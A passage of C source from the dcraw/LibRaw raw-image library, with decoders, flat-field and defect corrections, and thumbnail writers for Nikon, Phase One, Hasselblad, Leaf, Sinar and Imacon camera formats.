{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy after split */
0x39,0x5a,0x38,0x27,0x16,5,4,3,2,1,0,11,12,12 },
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0, /* 12-bit lossless */
5,4,6,3,7,2,8,1,9,0,10,11,12 },
{ 0,1,4,3,1,1,1,1,1,2,0,0,0,0,0,0, /* 14-bit lossy */
5,6,4,7,8,3,9,2,1,0,10,11,12,13,14 },
{ 0,1,5,1,1,1,1,1,1,1,2,0,0,0,0,0, /* 14-bit lossy after split */
8,0x5c,0x4b,0x3a,0x29,7,6,5,4,3,2,1,0,13,14 },
{ 0,1,4,2,2,3,1,2,0,0,0,0,0,0,0,0, /* 14-bit lossless */
7,6,8,5,9,4,10,3,11,12,2,0,1,13,14 } };
ushort *huff, ver0, ver1, vpred[2][2], hpred[2], csize;
int i, min, max, step=0, tree=0, split=0, row, col, len, shl, diff;
fseek (ifp, meta_offset, SEEK_SET);
ver0 = fgetc(ifp);
ver1 = fgetc(ifp);
if (ver0 == 0x49 || ver1 == 0x58)
fseek (ifp, 2110, SEEK_CUR);
if (ver0 == 0x46) tree = 2;
if (tiff_bps == 14) tree += 3;
read_shorts (vpred[0], 4);
max = 1 << tiff_bps & 0x7fff;
if ((csize = get2()) > 1)
step = max / (csize-1);
if (ver0 == 0x44 && ver1 == 0x20 && step > 0) {
for (i=0; i < csize; i++)
curve[i*step] = get2();
for (i=0; i < max; i++)
curve[i] = ( curve[i-i%step]*(step-i%step) +
curve[i-i%step+step]*(i%step) ) / step;
fseek (ifp, meta_offset+562, SEEK_SET);
split = get2();
} else if (ver0 != 0x46 && csize <= 0x4001)
read_shorts (curve, max=csize);
while (curve[max-2] == curve[max-1]) max--;
huff = make_decoder (nikon_tree[tree]);
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (min=row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (split && row == split) {
free (huff);
huff = make_decoder (nikon_tree[tree+1]);
max += (min = 16) << 1;
}
for (col=0; col < raw_width; col++) {
i = gethuff(huff);
len = i & 15;
shl = i >> 4;
diff = ((getbits(len-shl) << 1) + 1) << shl >> 1;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - !shl;
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if ((ushort)(hpred[col & 1] + min) >= max) derror();
RAW(row,col) = curve[LIM((short)hpred[col & 1],0,0x3fff)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (huff);
throw;
}
#endif
free (huff);
}
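/*
Nikon YUV-packed raw: every 6 input bytes hold four 12-bit values, two
luma samples and two shared chroma values, which are converted to RGB
and divided by the camera multipliers.
*/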
void CLASS nikon_yuv_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col, yuv[4], rgb[3], b, c;
UINT64 bitbuf=0;
float cmul[4];
FORC4 { cmul[c] = cam_mul[c]>0.001f?cam_mul[c]:1.f; }
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if (!(b = col & 1)) {
bitbuf = 0;
FORC(6) bitbuf |= (UINT64) fgetc(ifp) << c*8;
FORC(4) yuv[c] = (bitbuf >> c*12 & 0xfff) - (c >> 1 << 11);
}
rgb[0] = yuv[b] + 1.370705*yuv[3];
rgb[1] = yuv[b] - 0.337633*yuv[2] - 0.698001*yuv[3];
rgb[2] = yuv[b] + 1.732446*yuv[2];
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,0xfff)] / cmul[c];
}
}
}
/*
Returns 1 for a Coolpix 995, 0 for anything else.
*/
int CLASS nikon_e995()
{
int i, histo[256];
const uchar often[] = { 0x00, 0x55, 0xaa, 0xff };
memset (histo, 0, sizeof histo);
fseek (ifp, -2000, SEEK_END);
for (i=0; i < 2000; i++)
histo[fgetc(ifp)]++;
for (i=0; i < 4; i++)
if (histo[often[i]] < 200)
return 0;
return 1;
}
/*
Returns 1 for a Coolpix 2100, 0 for anything else.
*/
int CLASS nikon_e2100()
{
uchar t[12];
int i;
fseek (ifp, 0, SEEK_SET);
for (i=0; i < 1024; i++) {
fread (t, 1, 12, ifp);
if (((t[2] & t[4] & t[7] & t[9]) >> 4
& t[1] & t[6] & t[8] & t[11] & 3) != 3)
return 0;
}
return 1;
}
void CLASS nikon_3700()
{
int bits, i;
uchar dp[24];
static const struct {
int bits;
char t_make[12], t_model[15];
} table[] = {
{ 0x00, "Pentax", "Optio 33WR" },
{ 0x03, "Nikon", "E3200" },
{ 0x32, "Nikon", "E3700" },
{ 0x33, "Olympus", "C740UZ" } };
fseek (ifp, 3072, SEEK_SET);
fread (dp, 1, 24, ifp);
bits = (dp[8] & 3) << 4 | (dp[20] & 3);
for (i=0; i < sizeof table / sizeof *table; i++)
if (bits == table[i].bits) {
strcpy (make, table[i].t_make );
strcpy (model, table[i].t_model);
}
}
/*
Separates a Minolta DiMAGE Z2 from a Nikon E4300.
*/
int CLASS minolta_z2()
{
int i, nz;
char tail[424];
fseek (ifp, -sizeof tail, SEEK_END);
fread (tail, 1, sizeof tail, ifp);
for (nz=i=0; i < sizeof tail; i++)
if (tail[i]) nz++;
return nz > 20;
}
//@end COMMON
void CLASS jpeg_thumb();
//@out COMMON
void CLASS ppm_thumb()
{
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) malloc (thumb_length);
merror (thumb, "ppm_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fread (thumb, 1, thumb_length, ifp);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS ppm16_thumb()
{
int i;
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) calloc (thumb_length, 2);
merror (thumb, "ppm16_thumb()");
read_shorts ((ushort *) thumb, thumb_length);
for (i=0; i < thumb_length; i++)
thumb[i] = ((ushort *) thumb)[i] >> 8;
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS layer_thumb()
{
int i, c;
char *thumb, map[][4] = { "012","102" };
colors = thumb_misc >> 5 & 7;
thumb_length = thumb_width*thumb_height;
thumb = (char *) calloc (colors, thumb_length);
merror (thumb, "layer_thumb()");
fprintf (ofp, "P%d\n%d %d\n255\n",
5 + (colors >> 1), thumb_width, thumb_height);
fread (thumb, thumb_length, colors, ifp);
for (i=0; i < thumb_length; i++)
FORCC putc (thumb[i+thumb_length*(map[thumb_misc >> 8][c]-'0')], ofp);
free (thumb);
}
void CLASS rollei_thumb()
{
unsigned i;
ushort *thumb;
thumb_length = thumb_width * thumb_height;
thumb = (ushort *) calloc (thumb_length, 2);
merror (thumb, "rollei_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
read_shorts (thumb, thumb_length);
for (i=0; i < thumb_length; i++) {
putc (thumb[i] << 3, ofp);
putc (thumb[i] >> 5 << 2, ofp);
putc (thumb[i] >> 11 << 3, ofp);
}
free (thumb);
}
void CLASS rollei_load_raw()
{
uchar pixel[10];
unsigned iten = 0, isix, i, buffer = 0, todo[16];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width > 32767 || raw_height > 32767)
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixel = raw_width*(raw_height+7);
isix = raw_width * raw_height * 5 / 8;
while (fread (pixel, 1, 10, ifp) == 10) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (i=0; i < 10; i+=2) {
todo[i] = iten++;
todo[i+1] = pixel[i] << 8 | pixel[i+1];
buffer = pixel[i] >> 2 | buffer << 6;
}
for ( ; i < 16; i+=2) {
todo[i] = isix++;
todo[i+1] = buffer >> (14-i)*5;
}
for (i = 0; i < 16; i += 2)
if(todo[i] < maxpixel)
raw_image[todo[i]] = (todo[i + 1] & 0x3ff);
else
derror();
}
maximum = 0x3ff;
}
int CLASS raw (unsigned row, unsigned col)
{
return (row < raw_height && col < raw_width) ? RAW(row,col) : 0;
}
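/*
Applies a Phase One flat-field block: a coarse gain grid is read from
the file (floats or 1/32768 fixed point) and bilinearly interpolated
across the sensor, multiplying RAW() values in place.
*/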
void CLASS phase_one_flat_field (int is_float, int nc)
{
ushort head[8];
unsigned wide, high, y, x, c, rend, cend, row, col;
float *mrow, num, mult[4];
read_shorts (head, 8);
if (head[2] * head[3] * head[4] * head[5] == 0) return;
wide = head[2] / head[4] + (head[2] % head[4] != 0);
high = head[3] / head[5] + (head[3] % head[5] != 0);
mrow = (float *) calloc (nc*wide, sizeof *mrow);
merror (mrow, "phase_one_flat_field()");
for (y=0; y < high; y++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2) {
num = is_float ? getreal(11) : get2()/32768.0;
if (y==0) mrow[c*wide+x] = num;
else mrow[(c+1)*wide+x] = (num - mrow[c*wide+x]) / head[5];
}
if (y==0) continue;
rend = head[1] + y*head[5];
for (row = rend-head[5];
row < raw_height && row < rend &&
row < head[1]+head[3]-head[5]; row++) {
for (x=1; x < wide; x++) {
for (c=0; c < nc; c+=2) {
mult[c] = mrow[c*wide+x-1];
mult[c+1] = (mrow[c*wide+x] - mult[c]) / head[4];
}
cend = head[0] + x*head[4];
for (col = cend-head[4];
col < raw_width &&
col < cend && col < head[0]+head[2]-head[4]; col++) {
c = nc > 2 ? FC(row-top_margin,col-left_margin) : 0;
if (!(c & 1)) {
c = RAW(row,col) * mult[c];
RAW(row,col) = LIM(c,0,65535);
}
for (c=0; c < nc; c+=2)
mult[c] += mult[c+1];
}
}
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2)
mrow[c*wide+x] += mrow[(c+1)*wide+x];
}
}
free (mrow);
}
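/*
Parses the Phase One correction metadata at meta_offset and applies the
entries it recognizes: polynomial tone curves, bad-pixel and bad-column
fixes, flat fields, quadrant gain and linearization tables, and the
tag 0x412 correction grid.
*/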
int CLASS phase_one_correct()
{
unsigned entries, tag, data, save, col, row, type;
int len, i, j, k, cip, val[4], dev[4], sum, max;
int head[9], diff, mindiff=INT_MAX, off_412=0;
/* static */ const signed char dir[12][2] =
{ {-1,-1}, {-1,1}, {1,-1}, {1,1}, {-2,0}, {0,-2}, {0,2}, {2,0},
{-2,-2}, {-2,2}, {2,-2}, {2,2} };
float poly[8], num, cfrac, frac, mult[2], *yval[2]={NULL,NULL};
ushort *xval[2];
int qmult_applied = 0, qlin_applied = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if (!meta_length)
#else
if (half_size || !meta_length)
#endif
return 0;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Phase One correction...\n"));
#endif
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (entries--) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x419) { /* Polynomial curve */
for (get4(), i=0; i < 8; i++)
poly[i] = getreal(11);
poly[3] += (ph1.tag_210 - poly[7]) * poly[6] + 1;
for (i=0; i < 0x10000; i++) {
num = (poly[5]*i + poly[3])*i + poly[1];
curve[i] = LIM(num,0,65535);
} goto apply; /* apply to right half */
} else if (tag == 0x41a) { /* Polynomial curve */
for (i=0; i < 4; i++)
poly[i] = getreal(11);
for (i=0; i < 0x10000; i++) {
for (num=0, j=4; j--; )
num = num * i + poly[j];
curve[i] = LIM(num+i,0,65535);
} apply: /* apply to whole image */
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (tag & 1)*ph1.split_col; col < raw_width; col++)
RAW(row,col) = curve[RAW(row,col)];
}
} else if (tag == 0x400) { /* Sensor defects */
while ((len -= 8) >= 0) {
col = get2();
row = get2();
type = get2(); get2();
if (col >= raw_width) continue;
if (type == 131 || type == 137) /* Bad column */
for (row=0; row < raw_height; row++)
if (FC(row-top_margin,col-left_margin) == 1) {
for (sum=i=0; i < 4; i++)
sum += val[i] = raw (row+dir[i][0], col+dir[i][1]);
for (max=i=0; i < 4; i++) {
dev[i] = abs((val[i] << 2) - sum);
if (dev[max] < dev[i]) max = i;
}
RAW(row,col) = (sum - val[max])/3.0 + 0.5;
} else {
for (sum=0, i=8; i < 12; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = 0.5 + sum * 0.0732233 +
(raw(row,col-2) + raw(row,col+2)) * 0.3535534;
}
else if (type == 129) { /* Bad pixel */
if (row >= raw_height) continue;
j = (FC(row-top_margin,col-left_margin) != 1) * 4;
for (sum=0, i=j; i < j+8; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = (sum + 4) >> 3;
}
}
} else if (tag == 0x401) { /* All-color flat fields */
phase_one_flat_field (1, 2);
} else if (tag == 0x416 || tag == 0x410) {
phase_one_flat_field (0, 2);
} else if (tag == 0x40b) { /* Red+blue flat field */
phase_one_flat_field (0, 4);
} else if (tag == 0x412) {
fseek (ifp, 36, SEEK_CUR);
diff = abs (get2() - ph1.tag_21a);
if (mindiff > diff) {
mindiff = diff;
off_412 = ftell(ifp) - 38;
}
} else if (tag == 0x41f && !qlin_applied) { /* Quadrant linearization */
ushort lc[2][2][16], ref[16];
int qr, qc;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 16; i++)
lc[qr][qc][i] = get4();
for (i = 0; i < 16; i++) {
int v = 0;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
v += lc[qr][qc][i];
ref[i] = (v + 2) >> 2;
}
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[19], cf[19];
for (i = 0; i < 16; i++) {
cx[1+i] = lc[qr][qc][i];
cf[1+i] = ref[i];
}
cx[0] = cf[0] = 0;
cx[17] = cf[17] = ((unsigned int)ref[15] * 65535) / lc[qr][qc][15];
cf[18] = cx[18] = 65535;
cubic_spline(cx, cf, 19);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qlin_applied = 1;
} else if (tag == 0x41e && !qmult_applied) { /* Quadrant multipliers */
float qmult[2][2] = { { 1, 1 }, { 1, 1 } };
get4(); get4(); get4(); get4();
qmult[0][0] = 1.0 + getreal(11);
get4(); get4(); get4(); get4(); get4();
qmult[0][1] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][0] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][1] = 1.0 + getreal(11);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
i = qmult[row >= ph1.split_row][col >= ph1.split_col] * RAW(row,col);
RAW(row,col) = LIM(i,0,65535);
}
}
qmult_applied = 1;
} else if (tag == 0x431 && !qmult_applied) { /* Quadrant combined */
ushort lc[2][2][7], ref[7];
int qr, qc;
for (i = 0; i < 7; i++)
ref[i] = get4();
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 7; i++)
lc[qr][qc][i] = get4();
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[9], cf[9];
for (i = 0; i < 7; i++) {
cx[1+i] = ref[i];
cf[1+i] = ((unsigned) ref[i] * lc[qr][qc][i]) / 10000;
}
cx[0] = cf[0] = 0;
cx[8] = cf[8] = 65535;
cubic_spline(cx, cf, 9);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qmult_applied = 1;
qlin_applied = 1;
}
fseek (ifp, save, SEEK_SET);
}
if (off_412) {
fseek (ifp, off_412, SEEK_SET);
for (i=0; i < 9; i++) head[i] = get4() & 0x7fff;
yval[0] = (float *) calloc (head[1]*head[3] + head[2]*head[4], 6);
merror (yval[0], "phase_one_correct()");
yval[1] = (float *) (yval[0] + head[1]*head[3]);
xval[0] = (ushort *) (yval[1] + head[2]*head[4]);
xval[1] = (ushort *) (xval[0] + head[1]*head[3]);
get2();
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
yval[i][j] = getreal(11);
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
xval[i][j] = get2();
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
cfrac = (float) col * head[3] / raw_width;
cfrac -= cip = cfrac;
num = RAW(row,col) * 0.5;
for (i=cip; i < cip+2; i++) {
for (k=j=0; j < head[1]; j++)
if (num < xval[0][k = head[1]*i+j]) break;
frac = (j == 0 || j == head[1]) ? 0 :
(xval[0][k] - num) / (xval[0][k] - xval[0][k-1]);
mult[i-cip] = yval[0][k-1] * frac + yval[0][k] * (1-frac);
}
i = ((mult[0] * (1-cfrac) + mult[1] * cfrac) * row + num) * 2;
RAW(row,col) = LIM(i,0,65535);
}
}
free (yval[0]);
}
#ifdef LIBRAW_LIBRARY_BUILD
}
catch (...)
{
if(yval[0]) free(yval[0]);
return LIBRAW_CANCELLED_BY_CALLBACK;
}
#endif
return 0;
}
void CLASS phase_one_load_raw()
{
int a, b, i;
ushort akey, bkey, t_mask;
fseek (ifp, ph1.key_off, SEEK_SET);
akey = get2();
bkey = get2();
t_mask = ph1.format == 1 ? 0x5555:0x1354;
#ifdef LIBRAW_LIBRARY_BUILD
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw()");
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw()");
if (ph1.black_col)
{
fseek (ifp, ph1.black_col, SEEK_SET);
read_shorts ((ushort *)imgdata.rawdata.ph1_cblack[0], raw_height*2);
}
if (ph1.black_row)
{
fseek (ifp, ph1.black_row, SEEK_SET);
read_shorts ((ushort *) imgdata.rawdata.ph1_rblack[0], raw_width*2);
}
}
#endif
fseek (ifp, data_offset, SEEK_SET);
read_shorts (raw_image, raw_width*raw_height);
if (ph1.format)
for (i=0; i < raw_width*raw_height; i+=2) {
a = raw_image[i+0] ^ akey;
b = raw_image[i+1] ^ bkey;
raw_image[i+0] = (a & t_mask) | (b & ~t_mask);
raw_image[i+1] = (b & t_mask) | (a & ~t_mask);
}
}
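/*
Bit reader shared by the Phase One and Hasselblad decoders: keeps a
64-bit buffer refilled 32 bits at a time; with a Huffman table it
returns the decoded symbol, otherwise the next nbits raw bits.
*/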
unsigned CLASS ph1_bithuff (int nbits, ushort *huff)
{
#ifndef LIBRAW_NOTHREADS
#define bitbuf tls->ph1_bits.bitbuf
#define vbits tls->ph1_bits.vbits
#else
static UINT64 bitbuf=0;
static int vbits=0;
#endif
unsigned c;
if (nbits == -1)
return bitbuf = vbits = 0;
if (nbits == 0) return 0;
if (vbits < nbits) {
bitbuf = bitbuf << 32 | get4();
vbits += 32;
}
c = bitbuf << (64-vbits) >> (64-nbits);
if (huff) {
vbits -= huff[c] >> 8;
return (uchar) huff[c];
}
vbits -= nbits;
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#endif
}
#define ph1_bits(n) ph1_bithuff(n,0)
#define ph1_huff(h) ph1_bithuff(*h,h+1)
void CLASS phase_one_load_raw_c()
{
static const int length[] = { 8,7,6,9,11,10,5,12,14,13 };
int *offset, len[2], pred[2], row, col, i, j;
ushort *pixel;
short (*c_black)[2], (*r_black)[2];
#ifdef LIBRAW_LIBRARY_BUILD
if(ph1.format == 6)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width*3 + raw_height*4, 2);
merror (pixel, "phase_one_load_raw_c()");
offset = (int *) (pixel + raw_width);
fseek (ifp, strip_offset, SEEK_SET);
for (row=0; row < raw_height; row++)
offset[row] = get4();
c_black = (short (*)[2]) (offset + raw_height);
fseek (ifp, ph1.black_col, SEEK_SET);
if (ph1.black_col)
read_shorts ((ushort *) c_black[0], raw_height*2);
r_black = c_black + raw_height;
fseek (ifp, ph1.black_row, SEEK_SET);
if (ph1.black_row)
read_shorts ((ushort *) r_black[0], raw_width*2);
#ifdef LIBRAW_LIBRARY_BUILD
// Copy data to internal copy (even if not read)
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_cblack,(ushort*)c_black[0],raw_height*2*sizeof(ushort));
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_rblack,(ushort*)r_black[0],raw_width*2*sizeof(ushort));
}
#endif
for (i=0; i < 256; i++)
curve[i] = i*i / 3.969 + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + offset[row], SEEK_SET);
ph1_bits(-1);
pred[0] = pred[1] = 0;
for (col=0; col < raw_width; col++) {
if (col >= (raw_width & -8))
len[0] = len[1] = 14;
else if ((col & 7) == 0)
for (i=0; i < 2; i++) {
for (j=0; j < 5 && !ph1_bits(1); j++);
if (j--) len[i] = length[j*2 + ph1_bits(1)];
}
if ((i = len[col & 1]) == 14)
pixel[col] = pred[col & 1] = ph1_bits(16);
else
pixel[col] = pred[col & 1] += ph1_bits(i) + 1 - (1 << (i - 1));
if (pred[col & 1] >> 16) derror();
if (ph1.format == 5 && pixel[col] < 256)
pixel[col] = curve[pixel[col]];
}
#ifndef LIBRAW_LIBRARY_BUILD
for (col=0; col < raw_width; col++) {
int shift = ph1.format == 8? 0: 2;
i = (pixel[col] << shift) - ph1.t_black
+ c_black[row][col >= ph1.split_col]
+ r_black[col][row >= ph1.split_row];
if (i > 0) RAW(row,col) = i;
}
#else
if(ph1.format == 8)
memmove(&RAW(row,0),&pixel[0],raw_width*2);
else
for (col=0; col < raw_width; col++)
RAW(row,col) = pixel[col] << 2;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = 0xfffc - ph1.t_black;
}
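/*
Hasselblad 3FR/FFF: Huffman-coded differences (via ph1_huff/ph1_bits)
are added to per-column predictors kept in back[]; multi-sample files
either select one shot for raw_image or accumulate all samples into
image[].
*/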
void CLASS hasselblad_load_raw()
{
struct jhead jh;
int shot, row, col, *back[5], len[2], diff[12], pred, sh, f, s, c;
unsigned upix, urow, ucol;
ushort *ip;
if (!ljpeg_start (&jh, 0)) return;
order = 0x4949;
ph1_bits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
back[4] = (int *) calloc (raw_width, 3*sizeof **back);
merror (back[4], "hasselblad_load_raw()");
FORC3 back[c] = back[4] + c*raw_width;
cblack[6] >>= sh = tiff_samples > 1;
shot = LIM(shot_select, 1, tiff_samples) - 1;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC4 back[(c+3) & 3] = back[c];
for (col=0; col < raw_width; col+=2) {
for (s=0; s < tiff_samples*2; s+=2) {
FORC(2) len[c] = ph1_huff(jh.huff[0]);
FORC(2) {
diff[s+c] = ph1_bits(len[c]);
if ((diff[s+c] & (1 << (len[c]-1))) == 0)
diff[s+c] -= (1 << len[c]) - 1;
if (diff[s+c] == 65535) diff[s+c] = -32768;
}
}
for (s=col; s < col+2; s++) {
pred = 0x8000 + load_flags;
if (col) pred = back[2][s-2];
if (col && row > 1) switch (jh.psv) {
case 11: pred += back[0][s]/2 - back[0][s-2]/2; break;
}
f = (row & 1)*3 ^ ((col+s) & 1);
FORC (tiff_samples) {
pred += diff[(s & 1)*tiff_samples+c];
upix = pred >> sh & 0xffff;
if (raw_image && c == shot)
RAW(row,s) = upix;
if (image) {
urow = row-top_margin + (c & 1);
ucol = col-left_margin - ((c >> 1) & 1);
ip = &image[urow*width+ucol][f];
if (urow < height && ucol < width)
*ip = c < 4 ? upix : (*ip + upix) >> 1;
}
}
back[2][s] = pred;
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (back[4]);
ljpeg_end (&jh);
throw;
}
#endif
free (back[4]);
ljpeg_end (&jh);
if (image) mix_green = 1;
}
void CLASS leaf_hdr_load_raw()
{
ushort *pixel=0;
unsigned tile=0, r, c, row, col;
if (!filters) {
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "leaf_hdr_load_raw()");
}
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
FORC(tiff_samples)
for (r=0; r < raw_height; r++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (r % tile_length == 0) {
fseek (ifp, data_offset + 4*tile++, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
}
if (filters && c != shot_select) continue;
if (filters) pixel = raw_image + r*raw_width;
read_shorts (pixel, raw_width);
if (!filters && (row = r - top_margin) < height)
for (col=0; col < width; col++)
image[row*width+col][c] = pixel[col+left_margin];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
if(!filters) free(pixel);
throw;
}
#endif
if (!filters) {
maximum = 0xffff;
raw_color = 1;
free (pixel);
}
}
void CLASS unpacked_load_raw()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
read_shorts (raw_image, raw_width*raw_height);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS unpacked_load_raw_reversed()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
for (row=raw_height-1; row >= 0; row--)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
read_shorts (&raw_image[row*raw_width], raw_width);
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS sinar_4shot_load_raw()
{
ushort *pixel;
unsigned shot, row, col, r, c;
if (raw_image) {
shot = LIM (shot_select, 1, 4) - 1;
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
unpacked_load_raw();
return;
}
#ifdef LIBRAW_LIBRARY_BUILD
else if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "sinar_4shot_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (shot=0; shot < 4; shot++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
for (row=0; row < raw_height; row++) {
read_shorts (pixel, raw_width);
if ((r = row-top_margin - (shot >> 1 & 1)) >= height) continue;
for (col=0; col < raw_width; col++) {
if ((c = col-left_margin - (shot & 1)) >= width) continue;
image[r*width+c][(row & 1)*3 ^ (~col & 1)] = pixel[col];
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free(pixel);
throw;
}
#endif
free (pixel);
mix_green = 1;
}
void CLASS imacon_full_load_raw()
{
int row, col;
if (!image) return;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned short *buf = (unsigned short *)malloc(width*3*sizeof(unsigned short));
merror(buf,"imacon_full_load_raw");
#endif
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
read_shorts(buf,width*3);
unsigned short (*rowp)[4] = &image[row*width];
for (col=0; col < width; col++)
{
rowp[col][0]=buf[col*3];
rowp[col][1]=buf[col*3+1];
rowp[col][2]=buf[col*3+2];
rowp[col][3]=0;
}
#else
for (col=0; col < width; col++)
read_shorts (image[row*width+col], 3);
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(buf);
#endif
}
void CLASS packed_load_raw()
{
int vbits=0, bwide, rbits, bite, half, irow, row, col, val, i;
UINT64 bitbuf=0;
bwide = raw_width * tiff_bps / 8;
bwide += bwide & load_flags >> 7;
rbits = bwide * 8 - raw_width * tiff_bps;
